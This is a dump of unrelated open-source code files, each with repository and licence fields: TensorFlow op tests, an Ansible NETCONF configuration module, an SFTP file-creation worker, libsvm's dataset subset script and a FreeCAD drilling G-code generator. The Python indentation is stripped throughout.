assert np.all(np.equal(ovl_neg, -lhs))
np0 = np.random.random(100).reshape((10, 10))
np1 = np0 + np.random.randint(-1, 2, size=100).reshape((10, 10))
# test all binary infix operators
test_infix(np0, np1)
# test broadcasting from a scalar on rhs
test_infix(np0, np.random.random(1))
# test broadcasting from a scalar on lhs
test_infix(np.random.random(1), np0)
# attempting to negate an unsigned tensor should raise a type error
uint = np.random.randint(0, 10, size=10).astype(np.uint8)
try:
-no_op(uint)
except TypeError:
pass
else:
raise AssertionError
def test_cwise_binary_grad(self):
"""
Ensure that all component-wise binary functions in the math op library yield an identical gradient to tensorflow
"""
test_config = tf.ConfigProto(allow_soft_placement=False)
test_config.graph_options.optimizer_options.opt_level = -1
with tf.Session(config=test_config) as s:
lhs_np = np.random.random(100)
rhs_np = lhs_np + np.random.randint(-1, 2, size=100)
grad_above = tf.constant(np.random.random(100))
lhs = tf.constant(lhs_np)
rhs = tf.constant(rhs_np)
def test_grad(fcn, tf_fcn):
ovl_l = fcn(lhs, rhs)
ovl_r = fcn(rhs, lhs)
ovl_l, ovl_r = as_tensorflow([ovl_l, ovl_r])
tf_l = tf_fcn(lhs, rhs)
tf_r = tf_fcn(rhs, lhs)
tf_grad_l, tf_grad_r = tf.gradients(tf_l, [lhs, rhs], grad_above)
ovl_grad_l, ovl_grad_r = tf.gradients(ovl_l, [lhs, rhs], grad_above)
ovl_l, ovl_r, tf_l, tf_r, tf_grad_l, tf_grad_r, ovl_grad_l, ovl_grad_r = s.run([
ovl_l, ovl_r, tf_l, tf_r, tf_grad_l, tf_grad_r, ovl_grad_l, ovl_grad_r])
assert np.all(np.equal(ovl_l, tf_l))
assert np.all(np.equal(ovl_r, tf_r))
assert np.all(np.equal(tf_grad_l, ovl_grad_l))
assert np.all(np.equal(tf_grad_r, ovl_grad_r))
test_grad(lambda x, y: add(x, y), lambda x, y: tf.add(x, y))
test_grad(lambda x, y: sub(x, y), lambda x, y: tf.sub(x, y))
test_grad(lambda x, y: mul(x, y), lambda x, y: tf.mul(x, y))
test_grad(lambda x, y: div(x, y), lambda x, y: tf.div(x, y))
def test_cwise_unary_grad(self):
"""
Ensure that all component-wise unary functions in the math op library yield an identical gradient to tensorflow
"""
test_config = tf.ConfigProto(allow_soft_placement=False)
test_config.graph_options.optimizer_options.opt_level = -1
with tf.Session(config=test_config) as s:
arg_np = np.random.random(100)
grad_above = tf.constant(np.random.random(100))
arg = tf.constant(arg_np)
def test_grad(fcn, tf_fcn):
ovl_out = as_tensorflow(fcn(arg))
tf_out = tf_fcn(arg)
ovl_grad = tf.gradients(ovl_out, arg, grad_above)[0]
tf_grad = tf.gradients(tf_out, arg, grad_above)[0]
ovl_out, tf_out, ovl_grad, tf_grad = s.run([ovl_out, tf_out, ovl_grad, tf_grad])
assert np.allclose(ovl_out, tf_out)
assert np.allclose(ovl_grad, tf_grad)
test_grad(lambda x: neg(x), lambda x: tf.neg(x))
test_grad(lambda x: tanh(x), lambda x: tf.tanh(x))
test_grad(lambda x: sin(x), lambda x: tf.sin(x))
test_grad(lambda x: cos(x), lambda x: tf.cos(x))
test_grad(lambda x: tan(x), lambda x: tf.tan(x))
test_grad(lambda x: sigmoid(x), lambda x: tf.sigmoid(x))
def test_concat(self):
test_config = tf.ConfigProto(allow_soft_placement=False)
test_config.graph_options.optimizer_options.opt_level = -1
with tf.Session(config=test_config) as s:
num_concat = 5
args_1d = []
args_2d = []
args_3d = []
args_4d = []
for n in range(num_concat):
args_1d.append(tf.constant(np.random.random(10//num_concat).reshape((10//num_concat))))
args_2d.append(tf.constant(np.random.random(100//num_concat).reshape((10, 10//num_concat))))
args_3d.append(tf.constant(np.random.random(1000//num_concat).reshape((10, 10, 10//num_concat))))
args_4d.append(tf.constant(np.random.random(10000//num_concat).reshape((10, 10, 10, 10//num_concat))))
tf_1d = tf.concat(0, args_1d)
tf_2d = tf.concat(1, args_2d)
tf_3d = tf.concat(2, args_3d)
tf_4d = tf.concat(3, args_4d)
ovl_1d = as_tensorflow(concat(*args_1d, concat_dim=0))
ovl_2d = as_tensorflow(concat(*args_2d, concat_dim=1))
ovl_3d = as_tensorflow(concat(*args_3d, concat_dim=2))
ovl_4d = as_tensorflow(concat(*args_4d, concat_dim=3))
assert np.all(np.equal(*s.run([tf_1d, ovl_1d])))
assert np.all(np.equal(*s.run([tf_2d, ovl_2d])))
assert np.all(np.equal(*s.run([tf_3d, ovl_3d])))
assert np.all(np.equal(*s.run([tf_4d, ovl_4d])))
grad_above_1d = tf.constant(np.random.random(10))
grad_above_2d = tf.constant(np.random.random(100).reshape((10, 10)))
grad_above_3d = tf.constant(np.random.random(1000).reshape((10, 10, 10)))
grad_above_4d = tf.constant(np.random.random(10000).reshape((10, 10, 10, 10)))
tf_grads_1d = tf.gradients(tf_1d, args_1d, grad_above_1d)
tf_grads_2d = tf.gradients(tf_2d, args_2d, grad_above_2d)
tf_grads_3d = tf.gradients(tf_3d, args_3d, grad_above_3d)
tf_grads_4d = tf.gradients(tf_4d, args_4d, grad_above_4d)
ovl_grads_1d = tf.gradients(ovl_1d, args_1d, grad_above_1d)
ovl_grads_2d = tf.gradients(ovl_2d, args_2d, grad_above_2d)
ovl_grads_3d = tf.gradients(ovl_3d, args_3d, grad_above_3d)
ovl_grads_4d = tf.gradients(ovl_4d, args_4d, grad_above_4d)
for grad_index in range(num_concat):
assert np.all(np.equal(*s.run([tf_grads_1d[grad_index], ovl_grads_1d[grad_index]])))
assert np.all(np.equal(*s.run([tf_grads_2d[grad_index], ovl_grads_2d[grad_index]])))
assert np.all(np.equal(*s.run([tf_grads_3d[grad_index], ovl_grads_3d[grad_index]])))
assert np.all(np.equal(*s.run([tf_grads_4d[grad_index], ovl_grads_4d[grad_index]])))
# concatenate irregularly sized arrays
arg_irr1 = tf.constant(np.random.random(10*5).reshape(10, 5))
arg_irr2 = tf.constant(np.random.random(10*7).reshape(10, 7))
tf_irr = tf.concat(1, [arg_irr1, arg_irr2])
ovl_irr = as_tensorflow(concat(arg_irr1, arg_irr2, concat_dim=1))
assert np.all(np.equal(*s.run([tf_irr, ovl_irr])))
def test_split(self):
test_config = tf.ConfigProto(allow_soft_placement=False)
test_config.graph_options.optimizer_options.opt_level = -1
with tf.Session(config=test_config) as s:
arg_1d = tf.constant(np.random.random(10))
arg_2d = tf.constant(np.random.random(100).reshape((10, 10)))
arg_3d = tf.constant(np.random.random(1000).reshape((10, 10, 10)))
arg_4d = tf.constant(np.random.random(10000).reshape((10, 10, 10, 10)))
num_split = 5
ovl_1d = as_tensorflow(split(arg_1d, split_dim=0, num_split=num_split))
ovl_2d = as_tensorflow(split(arg_2d, split_dim=1, num_split=num_split))
ovl_3d = as_tensorflow(split(arg_3d, split_dim=2, num_split=num_split))
ovl_4d = as_tensorflow(split(arg_4d, split_dim=3, num_split=num_split))
tf_1d = tf.split(0, num_split, arg_1d)
tf_2d = tf.split(1, num_split, arg_2d)
tf_3d = tf.split(2, num_split, arg_3d)
tf_4d = tf.split(3, num_split, arg_4d)
for n in range(num_split):
assert np.all(np.equal(*s.run([ovl_1d[n], tf_1d[n]])))
assert np.all(np.equal(*s.run([ovl_2d[n], tf_2d[n]])))
assert np.all(np.equal(*s.run([ovl_3d[n], tf_3d[n]])))
assert np.all(np.equal(*s.run([ovl_4d[n], tf_4d[n]])))
grads_above_1d = []
grads_above_2d = []
grads_above_3d = []
grads_above_4d = []
for n in range(num_split):
grads_above_1d.append(tf.constant(np.random.random(10//num_split).reshape((10//num_split))))
grads_above_2d.append(tf.constant(np.random.random(100//num_split).reshape((10, 10//num_split))))
grads_above_3d.append(tf.constant(np.random.random(1000//num_split).reshape((10, 10, 10//num_split))))
grads_above_4d.append(tf.constant(np.random.random(10000//num_split).
reshape((10, 10, 10, 10//num_split))))
tf_grad_1d = tf.gradients(tf_1d, arg_1d, grads_above_1d)[0]
ovl_grad_1d = tf.gradients(ovl_1d, arg_1d, grads_above_1d)[0]
assert np.all(np.equal(*s.run([tf_grad_1d, ovl_grad_1d])))
tf_grad_2d = tf.gradients(tf_2d, arg_2d, grads_above_2d)[0]
ovl_grad_2d = tf.gradients(ovl_2d, arg_2d, grads_above_2d)[0]
assert np.all(np.equal(*s.run([tf_grad_2d, ovl_grad_2d])))
tf_grad_3d = tf.gradients(tf_3d, arg_3d, grads_above_3d)[0]
ovl_grad_3d = tf.gradients(ovl_3d, arg_3d, grads_above_3d)[0]
assert np.all(np.equal(*s.run([tf_grad_3d, ovl_grad_3d])))
tf_grad_4d = tf.gradients(tf_4d, arg_4d, grads_above_4d)[0]
ovl_grad_4d = tf.gradients(ovl_4d, arg_4d, grads_above_4d)[0]
assert np.all(np.equal(*s.run([tf_grad_4d, ovl_grad_4d])))
def test_lstm(self):
batches = 200
vec_len = 500
forget = 0.0
test_config = tf.ConfigProto(allow_soft_placement=False)
test_config.graph_options.optimizer_options.opt_level = -1
with tf.Session(config=test_config) as s:
concat_arg = tf.constant(np.random.normal(size=batches*4*vec_len).reshape((batches, 4*vec_len)))
c = tf.constant(np.random.normal(size=batches*vec_len).reshape((batches, vec_len)))
i, j, f, o = tf.split(1, 4, concat_arg)
new_c_tf = tf.mul(c, tf.sigmoid(f + forget)) + tf.sigmoid(i) * tf.tanh(j)
new_h_tf = tf.tanh(new_c_tf) * tf.sigmoid(o)
i, j, f, o = split(concat_arg, split_dim=1, num_split=4)
new_c = mul(c, sigmoid(f)) + sigmoid(i) * tanh(j)
new_h = tanh(new_c) * sigmoid(o)
new_c_ovl, new_h_ovl = as_tensorflow([new_c, new_h])
assert np.allclose(*s.run([new_c_tf, new_c_ovl]), rtol=1e-2)
assert np.allclose(*s.run([new_h_tf, new_h_ovl]), rtol=1e-2)
c_grad = tf.constant(np.random.normal(size=batches*vec_len).reshape((batches, vec_len)))
h_grad = tf.constant(np.random.normal(size=batches*vec_len).reshape((batches, vec_len)))
# gradients must be manually summed for tf version - why?
dnc_dc, dnc_dcat = tf.gradients([new_c_tf], [c, concat_arg], [c_grad])
dnh_dc, dnh_dcat = tf.gradients([new_h_tf], [c, concat_arg], [h_grad])
c_grad_tf, concat_grad_tf = dnc_dc+dnh_dc, dnc_dcat+dnh_dcat
c_grad_ovl, concat_grad_ovl = tf.gradients([new_h_ovl, new_c_ovl], [c, concat_arg], [h_grad, c_grad])
assert np.allclose(*s.run([concat_grad_tf, concat_grad_ovl]), rtol=1e-2)
assert np.allclose(*s.run([c_grad_tf, c_grad_ovl]), rtol=1e-2)
| apache-2.0 |
Dhivyap/ansible | lib/ansible/modules/network/netconf/netconf_config.py | 6 | 19384 | #!/usr/bin/python
# (c) 2016, Leandro Lisboa Penz <lpenz at lpenz.org>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = '''
---
module: netconf_config
version_added: "2.2"
author: "Leandro Lisboa Penz (@lpenz)"
short_description: netconf device configuration
description:
- Netconf is a network management protocol developed and standardized by
the IETF. It is documented in RFC 6241.
- This module allows the user to send a configuration XML file to a netconf
device, and detects if there was a configuration change.
extends_documentation_fragment:
- netconf
- network_agnostic
options:
content:
description:
- The configuration data as defined by the device's data models, the value can be either in
xml string format or text format. The format of the configuration should be supported by remote
Netconf server
aliases: ['xml']
target:
description:
Name of the configuration datastore to be edited.
- auto, uses candidate and fallback to running
- candidate, edit <candidate/> datastore and then commit
- running, edit <running/> datastore directly
default: auto
version_added: "2.4"
aliases: ['datastore']
source_datastore:
description:
- Name of the configuration datastore to use as the source to copy the configuration
to the datastore mentioned by C(target) option. The values can be either I(running), I(candidate),
I(startup) or a remote URL
version_added: "2.7"
aliases: ['source']
format:
description:
- The format of the configuration provided as value of C(content). Accepted values are I(xml) and I(text) and
the given configuration format should be supported by remote Netconf server.
default: xml
choices: ['xml', 'text']
version_added: "2.7"
lock:
description:
- Instructs the module to explicitly lock the datastore specified as C(target). By setting the option
value I(always) is will explicitly lock the datastore mentioned in C(target) option. It the value
is I(never) it will not lock the C(target) datastore. The value I(if-supported) lock the C(target)
datastore only if it is supported by the remote Netconf server.
default: always
choices: ['never', 'always', 'if-supported']
version_added: "2.7"
default_operation:
description:
- The default operation for <edit-config> rpc, valid values are I(merge), I(replace) and I(none).
If the default value is merge, the configuration data in the C(content) option is merged at the
corresponding level in the C(target) datastore. If the value is replace the data in the C(content)
option completely replaces the configuration in the C(target) datastore. If the value is none the C(target)
datastore is unaffected by the configuration in the config option, unless and until the incoming configuration
data uses the C(operation) operation to request a different operation.
choices: ['merge', 'replace', 'none']
version_added: "2.7"
confirm:
description:
- This argument will configure a timeout value for the commit to be confirmed before it is automatically
rolled back. If the C(confirm_commit) argument is set to False, this argument is silently ignored. If the
value of this argument is set to 0, the commit is confirmed immediately. The remote host MUST
support :candidate and :confirmed-commit capability for this option to .
default: 0
version_added: "2.7"
confirm_commit:
description:
- This argument will execute commit operation on remote device. It can be used to confirm a previous commit.
type: bool
default: 'no'
version_added: "2.7"
error_option:
description:
- This option controls the netconf server action after an error occurs while editing the configuration.
- If I(error_option=stop-on-error), abort the config edit on first error.
- If I(error_option=continue-on-error), continue to process configuration data on error.
The error is recorded and negative response is generated if any errors occur.
- If I(error_option=rollback-on-error), rollback to the original configuration if
any error occurs.
This requires the remote Netconf server to support the I(error_option=rollback-on-error) capability.
default: stop-on-error
choices: ['stop-on-error', 'continue-on-error', 'rollback-on-error']
version_added: "2.7"
save:
description:
- The C(save) argument instructs the module to save the configuration in C(target) datastore to the
startup-config if changed and if :startup capability is supported by Netconf server.
default: false
version_added: "2.4"
type: bool
backup:
description:
- This argument will cause the module to create a full backup of
the current C(running-config) from the remote device before any
changes are made. If the C(backup_options) value is not given,
the backup file is written to the C(backup) folder in the playbook
root directory or role root directory, if playbook is part of an
ansible role. If the directory does not exist, it is created.
type: bool
default: 'no'
version_added: "2.7"
delete:
description:
- It instructs the module to delete the configuration from value mentioned in C(target) datastore.
type: bool
default: 'no'
version_added: "2.7"
commit:
description:
- This boolean flag controls if the configuration changes should be committed or not after editing the
candidate datastore. This option is supported only if remote Netconf server supports :candidate
capability. If the value is set to I(False) commit won't be issued after edit-config operation
and user needs to handle commit or discard-changes explicitly.
type: bool
default: True
version_added: "2.7"
validate:
description:
- This boolean flag if set validates the content of datastore given in C(target) option.
For this option to work remote Netconf server should support :validate capability.
type: bool
default: False
version_added: "2.7"
src:
description:
- Specifies the source path to the xml file that contains the configuration or configuration template
to load. The path to the source file can either be the full path on the Ansible control host or
a relative path from the playbook or role root directory. This argument is mutually exclusive with I(xml).
version_added: "2.4"
backup_options:
description:
- This is a dict object containing configurable options related to backup file path.
The value of this option is read only when C(backup) is set to I(yes), if C(backup) is set
to I(no) this option will be silently ignored.
suboptions:
filename:
description:
- The filename to be used to store the backup configuration. If the the filename
is not given it will be generated based on the hostname, current time and date
in format defined by <hostname>_config.<current-date>@<current-time>
dir_path:
description:
- This option provides the path ending with directory name in which the backup
configuration file will be stored. If the directory does not exist it will be first
created and the filename is either the value of C(filename) or default filename
as described in C(filename) options description. If the path value is not given
in that case a I(backup) directory will be created in the current working directory
and backup configuration will be copied in C(filename) within I(backup) directory.
type: path
type: dict
version_added: "2.8"
requirements:
- "ncclient"
notes:
- This module requires the netconf system service be enabled on
the remote device being managed.
- This module supports devices with and without the candidate and
confirmed-commit capabilities. It will always use the safer feature.
- This module supports the use of connection=netconf
'''
EXAMPLES = '''
- name: use lookup filter to provide xml configuration
netconf_config:
content: "{{ lookup('file', './config.xml') }}"
- name: set ntp server in the device
netconf_config:
content: |
<config xmlns:xc="urn:ietf:params:xml:ns:netconf:base:1.0">
<system xmlns="urn:ietf:params:xml:ns:yang:ietf-system">
<ntp>
<enabled>true</enabled>
<server>
<name>ntp1</name>
<udp><address>127.0.0.1</address></udp>
</server>
</ntp>
</system>
</config>
- name: wipe ntp configuration
netconf_config:
content: |
<config xmlns:xc="urn:ietf:params:xml:ns:netconf:base:1.0">
<system xmlns="urn:ietf:params:xml:ns:yang:ietf-system">
<ntp>
<enabled>false</enabled>
<server operation="remove">
<name>ntp1</name>
</server>
</ntp>
</system>
</config>
- name: configure interface while providing different private key file path (for connection=netconf)
netconf_config:
backup: yes
register: backup_junos_location
vars:
ansible_private_key_file: /home/admin/.ssh/newprivatekeyfile
- name: configurable backup path
netconf_config:
backup: yes
backup_options:
filename: backup.cfg
dir_path: /home/user
'''
RETURN = '''
server_capabilities:
description: list of capabilities of the server
returned: success
type: list
sample: ['urn:ietf:params:netconf:base:1.1','urn:ietf:params:netconf:capability:confirmed-commit:1.0','urn:ietf:params:netconf:capability:candidate:1.0']
backup_path:
description: The full path to the backup file
returned: when backup is yes
type: str
sample: /playbooks/ansible/backup/config.2016-07-16@22:28:34
diff:
description: If --diff option in enabled while running, the before and after configuration change are
returned as part of before and after key.
returned: when diff is enabled
type: dict
sample:
"after": "<rpc-reply>\n<data>\n<configuration>\n<version>17.3R1.10</version>...<--snip-->"
"before": "<rpc-reply>\n<data>\n<configuration>\n <version>17.3R1.10</version>...<--snip-->"
'''
from ansible.module_utils._text import to_text
from ansible.module_utils.basic import AnsibleModule, env_fallback
from ansible.module_utils.connection import Connection, ConnectionError
from ansible.module_utils.network.netconf.netconf import get_capabilities, get_config, sanitize_xml
try:
from lxml.etree import tostring
except ImportError:
from xml.etree.ElementTree import tostring
def main():
""" main entry point for module execution
"""
backup_spec = dict(
filename=dict(),
dir_path=dict(type='path')
)
argument_spec = dict(
content=dict(aliases=['xml']),
target=dict(choices=['auto', 'candidate', 'running'], default='auto', aliases=['datastore']),
source_datastore=dict(aliases=['source']),
format=dict(choices=['xml', 'text'], default='xml'),
lock=dict(choices=['never', 'always', 'if-supported'], default='always'),
default_operation=dict(choices=['merge', 'replace', 'none']),
confirm=dict(type='int', default=0),
confirm_commit=dict(type='bool', default=False),
error_option=dict(choices=['stop-on-error', 'continue-on-error', 'rollback-on-error'], default='stop-on-error'),
backup=dict(type='bool', default=False),
backup_options=dict(type='dict', options=backup_spec),
save=dict(type='bool', default=False),
delete=dict(type='bool', default=False),
commit=dict(type='bool', default=True),
validate=dict(type='bool', default=False),
)
# deprecated options
netconf_top_spec = {
'src': dict(type='path', removed_in_version=2.11),
'host': dict(removed_in_version=2.11),
'port': dict(removed_in_version=2.11, type='int', default=830),
'username': dict(fallback=(env_fallback, ['ANSIBLE_NET_USERNAME']), removed_in_version=2.11, no_log=True),
'password': dict(fallback=(env_fallback, ['ANSIBLE_NET_PASSWORD']), removed_in_version=2.11, no_log=True),
'ssh_keyfile': dict(fallback=(env_fallback, ['ANSIBLE_NET_SSH_KEYFILE']), removed_in_version=2.11, type='path'),
'hostkey_verify': dict(removed_in_version=2.11, type='bool', default=True),
'look_for_keys': dict(removed_in_version=2.11, type='bool', default=True),
'timeout': dict(removed_in_version=2.11, type='int', default=10),
}
argument_spec.update(netconf_top_spec)
mutually_exclusive = [('content', 'src', 'source', 'delete', 'confirm_commit')]
required_one_of = [('content', 'src', 'source', 'delete', 'confirm_commit')]
module = AnsibleModule(argument_spec=argument_spec,
required_one_of=required_one_of,
mutually_exclusive=mutually_exclusive,
supports_check_mode=True)
if module.params['src']:
module.deprecate(msg="argument 'src' has been deprecated. Use file lookup plugin instead to read file contents.",
version="2.11")
config = module.params['content'] or module.params['src']
target = module.params['target']
lock = module.params['lock']
source = module.params['source_datastore']
delete = module.params['delete']
confirm_commit = module.params['confirm_commit']
confirm = module.params['confirm']
validate = module.params['validate']
save = module.params['save']
conn = Connection(module._socket_path)
capabilities = get_capabilities(module)
operations = capabilities['device_operations']
supports_commit = operations.get('supports_commit', False)
supports_writable_running = operations.get('supports_writable_running', False)
supports_startup = operations.get('supports_startup', False)
# identify target datastore
if target == 'candidate' and not supports_commit:
module.fail_json(msg=':candidate is not supported by this netconf server')
elif target == 'running' and not supports_writable_running:
module.fail_json(msg=':writable-running is not supported by this netconf server')
elif target == 'auto':
if supports_commit:
target = 'candidate'
elif supports_writable_running:
target = 'running'
else:
module.fail_json(msg='neither :candidate nor :writable-running are supported by this netconf server')
# Netconf server capability validation against input options
if save and not supports_startup:
module.fail_json(msg='cannot copy <%s/> to <startup/>, while :startup is not supported' % target)
if confirm_commit and not operations.get('supports_confirm_commit', False):
module.fail_json(msg='confirm commit is not supported by Netconf server')
if (confirm > 0) and not operations.get('supports_confirm_commit', False):
module.fail_json(msg='confirm commit is not supported by this netconf server, given confirm timeout: %d' % confirm)
if validate and not operations.get('supports_validate', False):
module.fail_json(msg='validate is not supported by this netconf server')
if lock == 'never':
execute_lock = False
elif target in operations.get('lock_datastore', []):
# lock is requested (always/if-support) and supported => lets do it
execute_lock = True
else:
# lock is requested (always/if-supported) but not supported => issue warning
module.warn("lock operation on '%s' source is not supported on this device" % target)
execute_lock = (lock == 'always')
result = {'changed': False, 'server_capabilities': capabilities.get('server_capabilities', [])}
before = None
after = None
locked = False
try:
if module.params['backup']:
response = get_config(module, target, lock=execute_lock)
before = to_text(tostring(response), errors='surrogate_then_replace').strip()
result['__backup__'] = before.strip()
if validate:
conn.validate(target)
if source:
if not module.check_mode:
conn.copy(source, target)
result['changed'] = True
elif delete:
if not module.check_mode:
conn.delete(target)
result['changed'] = True
elif confirm_commit:
if not module.check_mode:
conn.commit()
result['changed'] = True
elif config:
if module.check_mode and not supports_commit:
module.warn("check mode not supported as Netconf server doesn't support candidate capability")
result['changed'] = True
module.exit_json(**result)
if execute_lock:
conn.lock(target=target)
locked = True
if before is None:
before = to_text(conn.get_config(source=target), errors='surrogate_then_replace').strip()
kwargs = {
'config': config,
'target': target,
'default_operation': module.params['default_operation'],
'error_option': module.params['error_option'],
'format': module.params['format'],
}
conn.edit_config(**kwargs)
if supports_commit and module.params['commit']:
after = to_text(conn.get_config(source='candidate'), errors='surrogate_then_replace').strip()
if not module.check_mode:
confirm_timeout = confirm if confirm > 0 else None
confirmed_commit = True if confirm_timeout else False
conn.commit(confirmed=confirmed_commit, timeout=confirm_timeout)
else:
conn.discard_changes()
if after is None:
after = to_text(conn.get_config(source='running'), errors='surrogate_then_replace').strip()
sanitized_before = sanitize_xml(before)
sanitized_after = sanitize_xml(after)
if sanitized_before != sanitized_after:
result['changed'] = True
if result['changed']:
if save and not module.check_mode:
conn.copy_config(target, 'startup')
if module._diff:
result['diff'] = {'before': sanitized_before, 'after': sanitized_after}
except ConnectionError as e:
module.fail_json(msg=to_text(e, errors='surrogate_then_replace').strip())
finally:
if locked:
conn.unlock(target=target)
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
LTD-Beget/sprutio-rpc | lib/FileManager/workers/sftp/newFile.py | 1 | 1671 | import traceback
from lib.FileManager.workers.baseWorkerCustomer import BaseWorkerCustomer
class NewFile(BaseWorkerCustomer):
def __init__(self, path, session, *args, **kwargs):
super(NewFile, self).__init__(*args, **kwargs)
self.path = path
self.session = session
def run(self):
try:
self.preload()
sftp = self.get_sftp_connection(self.session)
abs_path = self.path
self.logger.debug("FM NewFile worker run(), abs_path = %s" % abs_path)
try:
if sftp.exists(abs_path):
raise OSError("File path already exists")
fd = sftp.open(abs_path, 'w')
if fd:
fd.close()
info = sftp.make_file_info(abs_path)
info["name"] = abs_path
else:
raise Exception('Cannot write file resource on server')
result = {
"data": info,
"error": False,
"message": None,
"traceback": None
}
self.on_success(result)
except OSError:
result = {
"error": True,
"message": "File path already exists",
"traceback": traceback.format_exc()
}
self.on_error(result)
except Exception as e:
result = {
"error": True,
"message": str(e),
"traceback": traceback.format_exc()
}
self.on_error(result)
| gpl-3.0 |
surban/libsvm-orig | tools/subset.py | 124 | 3202 | #!/usr/bin/env python
import os, sys, math, random
from collections import defaultdict
if sys.version_info[0] >= 3:
xrange = range
def exit_with_help(argv):
print("""\
Usage: {0} [options] dataset subset_size [output1] [output2]
This script randomly selects a subset of the dataset.
options:
-s method : method of selection (default 0)
0 -- stratified selection (classification only)
1 -- random selection
output1 : the subset (optional)
output2 : rest of the data (optional)
If output1 is omitted, the subset will be printed on the screen.""".format(argv[0]))
exit(1)
def process_options(argv):
argc = len(argv)
if argc < 3:
exit_with_help(argv)
# default method is stratified selection
method = 0
subset_file = sys.stdout
rest_file = None
i = 1
while i < argc:
if argv[i][0] != "-":
break
if argv[i] == "-s":
i = i + 1
method = int(argv[i])
if method not in [0,1]:
print("Unknown selection method {0}".format(method))
exit_with_help(argv)
i = i + 1
dataset = argv[i]
subset_size = int(argv[i+1])
if i+2 < argc:
subset_file = open(argv[i+2],'w')
if i+3 < argc:
rest_file = open(argv[i+3],'w')
return dataset, subset_size, method, subset_file, rest_file
def random_selection(dataset, subset_size):
l = sum(1 for line in open(dataset,'r'))
return sorted(random.sample(xrange(l), subset_size))
def stratified_selection(dataset, subset_size):
labels = [line.split(None,1)[0] for line in open(dataset)]
label_linenums = defaultdict(list)
for i, label in enumerate(labels):
label_linenums[label] += [i]
l = len(labels)
remaining = subset_size
ret = []
# classes with fewer data are sampled first; otherwise
# some rare classes may not be selected
for label in sorted(label_linenums, key=lambda x: len(label_linenums[x])):
linenums = label_linenums[label]
label_size = len(linenums)
# at least one instance per class
s = int(min(remaining, max(1, math.ceil(label_size*(float(subset_size)/l)))))
if s == 0:
sys.stderr.write('''\
Error: failed to have at least one instance per class
1. You may have regression data.
2. Your classification data is unbalanced or too small.
Please use -s 1.
''')
sys.exit(-1)
remaining -= s
ret += [linenums[i] for i in random.sample(xrange(label_size), s)]
return sorted(ret)
def main(argv=sys.argv):
dataset, subset_size, method, subset_file, rest_file = process_options(argv)
#uncomment the following line to fix the random seed
#random.seed(0)
selected_lines = []
if method == 0:
selected_lines = stratified_selection(dataset, subset_size)
elif method == 1:
selected_lines = random_selection(dataset, subset_size)
#select instances based on selected_lines
dataset = open(dataset,'r')
prev_selected_linenum = -1
for i in xrange(len(selected_lines)):
for cnt in xrange(selected_lines[i]-prev_selected_linenum-1):
line = dataset.readline()
if rest_file:
rest_file.write(line)
subset_file.write(dataset.readline())
prev_selected_linenum = selected_lines[i]
subset_file.close()
if rest_file:
for line in dataset:
rest_file.write(line)
rest_file.close()
dataset.close()
if __name__ == '__main__':
main(sys.argv)
| bsd-3-clause |
Creworker/FreeCAD | src/Mod/Path/PathScripts/PathDrilling.py | 9 | 8433 | # -*- coding: utf-8 -*-
#***************************************************************************
#* *
#* Copyright (c) 2014 Yorik van Havre <yorik@uncreated.net> *
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* as published by the Free Software Foundation; either version 2 of *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* This program is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Library General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with this program; if not, write to the Free Software *
#* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
#* USA *
#* *
#***************************************************************************
import FreeCAD,FreeCADGui,Path,PathGui
from PySide import QtCore,QtGui
from PathScripts import PathUtils,PathSelection,PathProject
"""Path Drilling object and FreeCAD command"""
# Qt tanslation handling
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def translate(context, text, disambig=None):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def translate(context, text, disambig=None):
return QtGui.QApplication.translate(context, text, disambig)
class ObjectDrilling:
def __init__(self,obj):
#obj.addProperty("App::PropertyVector","StartPoint","Path",translate("PathProfile","The start position of the drilling"))
obj.addProperty("App::PropertyLinkSub","Base","Path",translate("Parent Object","The base geometry of this toolpath"))
obj.addProperty("App::PropertyVectorList","locations","Path","The drilling locations")
obj.addProperty("App::PropertyLength", "PeckDepth", "Drilling", translate("PeckDepth","Incremental Drill depth before retracting to clear chips"))
#obj.PeckDepth = (0,0,1000,1)
obj.addProperty("App::PropertyDistance", "ClearanceHeight", "Drilling", translate("Clearance Height","The height needed to clear clamps and obstructions"))
obj.addProperty("App::PropertyDistance", "FinalDepth", "Drilling", translate("Final Depth","Final Depth of Tool- lowest value in Z"))
obj.addProperty("App::PropertyDistance", "RetractHeight", "Drilling", translate("Retract Height","The height where feed starts and height during retract tool when path is finished"))
obj.addProperty("App::PropertyLength", "VertFeed", "Feed",translate("Vert Feed","Feed rate for vertical moves in Z"))
#obj.addProperty("App::PropertySpeed", "HorizFeed", "Feed",translate("Horiz Feed","Feed rate for horizontal moves")) #not needed for drilling
obj.addProperty("App::PropertyString","Comment","Path",translate("PathProject","An optional comment for this profile"))
obj.addProperty("App::PropertyBool","Active","Path",translate("Active","Make False, to prevent operation from generating code"))
obj.addProperty("App::PropertyIntegerConstraint","ToolNumber","Tool",translate("PathProfile","The tool number in use"))
obj.ToolNumber = (0,0,1000,1)
obj.setEditorMode('ToolNumber',1) #make this read only
obj.Proxy = self
def __getstate__(self):
return None
def __setstate__(self,state):
return None
def execute(self,obj):
output = "G90 G98\n"
# rapid to first hole location, with spindle still retracted:
p0 = obj.locations[0]
output += "G0 X"+str(p0.x) + " Y" + str(p0.y)+ "\n"
# move tool to clearance plane
output += "G0 Z" + str(obj.ClearanceHeight.Value) + "\n"
if obj.PeckDepth.Value > 0:
cmd = "G83"
qword = " Q"+ str(obj.PeckDepth.Value)
else:
cmd = "G81"
qword = ""
for p in obj.locations:
output += cmd + " X" + str(p.x) + " Y" + str(p.y) + " Z" + str(obj.FinalDepth.Value) + qword + " R" + str(obj.RetractHeight.Value) + " F" + str(obj.VertFeed.Value) + "\n"
output += "G80\n"
print output
